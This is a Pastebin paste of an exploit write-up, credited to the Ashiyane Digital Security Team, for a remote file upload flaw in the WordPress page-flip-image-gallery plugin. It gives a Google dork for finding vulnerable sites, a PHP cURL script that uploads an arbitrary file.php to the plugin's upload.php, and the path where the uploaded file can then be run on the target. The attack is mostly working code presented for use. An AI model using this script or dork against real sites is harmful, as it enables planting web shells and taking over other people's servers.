Googleinurl

Exploit Title: Wordpress page-flip-image-gallery plugins Rem

Dec 9th, 2013
585
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ###############################################################
  2. # Exploit Title: Wordpress page-flip-image-gallery plugins Remote File
  3. Upload Vulnerability
  4. # Author: Ashiyane Digital Security Team
  5. # Date: 12/06/2013
  6. # Vendor Homepage: http://pageflipgallery.com
  7. # Software Link :
  8. http://downloads.wordpress.org/plugin/page-flip-image-gallery.zip
  9. # Google dork: inurl:/wp-content/plugins/page-flip-image-gallery/
  10. # Tested on: Windows/Linux
  11. ###############################################################
  12.  
  13. 1)Exploit :
  14. = = = = = =
  15.  
  16. <?php
  17. $uploadfile="file.php";
  18. $ch = curl_init("
  19. http://127.0.0.1/wp-content/plugins/page-flip-image-gallery/upload.php");
  20. curl_setopt($ch, CURLOPT_POST, true);
  21. curl_setopt($ch, CURLOPT_POSTFIELDS,
  22. array('orange_themes'=>"@$uploadfile")); curl_setopt($ch,
  23. CURLOPT_RETURNTRANSFER, 1);
  24. $postResult = curl_exec($ch);
  25. curl_close($ch); print "$postResult";
  26. ?>
  27.  
  28. http://[Target]/wp-content/uploads/file.php
  29.  
  30. # #### #### #### #### #### #### #### #### #
  31. # BY T3rm!nat0r5
  32. # E-mail : poya.terminator@gmail.com
  33. # #### #### #### #### #### #### #### #### #
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×